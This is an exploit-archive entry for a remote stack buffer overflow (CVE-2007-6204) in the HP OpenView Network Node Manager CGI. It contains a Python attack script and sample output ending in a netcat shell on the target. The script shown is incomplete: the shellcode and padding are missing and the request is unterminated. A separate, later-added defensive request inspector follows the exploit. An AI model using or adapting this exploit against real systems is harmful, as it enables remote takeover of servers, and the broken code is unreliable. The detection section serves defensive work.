HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow

Related Vulnerabilities: CVE-2007-6204  
Publish Date: 12 Dec 2007
Author: muts
# HP OpenView Network Node Manager CGI Buffer Overflow
# Tested on NNM Release B.07.50 / Windows 2000 server SP4
# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
# Coded by Mati Aharoni
# muts|offensive-security|com
# http://www.offensive-security.com/0day/hpnnm.txt
# Notes:
# Vanilla stack-based overflow
# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking 
# the entry point and injecting Sleep just before exe execution. This gave me enough 
# time to attach a debugger before program termination. If anyone knows how to properly 
# debug this, please tell me about it - there *must* be a better way...
# bt tools # ./sploit
# [+] Connecting to
# [+] Sending Evil Buffer to NNM CGI
# [+] Payload Sent, ph33r.
# bt tools # nc -nv 4444
# (UNKNOWN) [] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
# C:\Program Files\HP OpenView\www\cgi-bin>

import socket
import os
import sys
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[+] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 80 ) )
print "[+] Sending Evil Buffer to NNM CGI\n"
buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4
# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */

expl.send (buffer)
print "[+] Payload Sent, ph33r."

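A defensive counterpart, added here as an example and not part of muts's exploit: a request-line inspector that flags GET requests to the vulnerable /OvCgi/OpenView5.exe CGI whose Action parameter is abnormally long or carries raw non-printable bytes (the exploit above places a raw 4-byte return address followed by a 696-byte alpha2-encoded payload in that parameter). The length threshold, the sample request lines and all function names are assumptions for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumed thresholds for this example (not from the advisory): a legitimate
# NNM "Action" value is a short keyword, while the exploit's alpha2-encoded
# payload alone is 696 bytes and is preceded by a raw 4-byte return address.
MAX_ACTION_LEN = 200
TARGET_PATH = "/ovcgi/openview5.exe"

REQUEST_LINE = re.compile(rb"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")

# Constructed sample request lines: one benign, one shaped like the exploit
# (raw return-address bytes followed by a long alphanumeric payload).
SAMPLE_LINES = [
    b"GET /OvCgi/OpenView5.exe?Context=Snmp&Action=Read HTTP/1.0\r\n",
    b"GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
    + b"\x29\x4c\xe1\x77" + b"A" * 300 + b" HTTP/1.0\r\n",
]

def inspect_request_line(raw: bytes) -> dict:
    """Return {'suspicious': bool, 'reasons': [str]} for one raw request line.

    The target is decoded as latin-1 so raw high bytes survive; parse_qsl
    also percent-decodes, so a %-encoded return address is caught as well.
    """
    result = {"suspicious": False, "reasons": []}
    m = REQUEST_LINE.match(raw.rstrip(b"\r\n"))
    if not m:
        result.update(suspicious=True, reasons=["malformed request line"])
        return result
    parts = urlsplit(m.group("target").decode("latin-1"))
    if parts.path.lower() != TARGET_PATH:
        return result  # not the vulnerable CGI; nothing to check
    params = {k.lower(): v for k, v in parse_qsl(parts.query, keep_blank_values=True)}
    action = params.get("action", "")
    if len(action) > MAX_ACTION_LEN:
        result["reasons"].append(f"Action length {len(action)} exceeds {MAX_ACTION_LEN}")
    if any(not 0x20 <= ord(c) <= 0x7E for c in action):
        result["reasons"].append("non-printable bytes in Action")
    result["suspicious"] = bool(result["reasons"])
    return result

def scan(lines) -> list:
    """Return the indexes of suspicious lines, e.g. to validate an IDS/WAF rule."""
    return [i for i, line in enumerate(lines) if inspect_request_line(line)["suspicious"]]

if __name__ == "__main__":
    for i in scan(SAMPLE_LINES):
        print(i, inspect_request_line(SAMPLE_LINES[i])["reasons"])
```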
# milw0rm.com [2007-12-12]